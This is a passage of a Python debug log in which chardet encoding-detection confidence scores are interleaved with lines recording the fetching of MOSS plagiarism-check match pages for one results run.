0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5580147851981956\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5456726203364073\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match109-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match109-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match109-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match112-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match112-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match112-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match111-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match111-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match111-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5329023705003662\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 20461\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 20448\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 20461\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19272\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 20448\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19259\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 20448\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19272\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19259\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 20449\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19259\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 20448\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19260\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 55752\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19259\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match110-top.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match110-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match110-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match115-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 55752\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 55752\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 55753\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5431264812209726\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5427683112039856\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 55752\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21292\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21279\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match115-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match115-1.html\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5572443208185692\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match114-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match114-0.html\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21292\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match114-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match113-top.html\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21279\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21279\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21280\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21279\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5328896898249345\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5356932451887929\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match113-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match113-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match117-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17259\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17246\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17259\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17246\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17246\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17247\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17246\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19305\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 36858\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19292\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 36845\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19305\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5269681091234343\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 36858\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19292\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match117-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match117-1.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19292\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 36845\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19293\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 36845\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19292\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 36846\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 36845\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5437249762076334\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5616347080687375\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16931\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match116-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match116-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match116-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match120-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match120-0.html\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16918\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match120-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match118-top.html\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16931\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16918\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16918\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16919\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16918\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5281306826155204\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match118-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match118-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24655\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match119-top.html\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24642\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 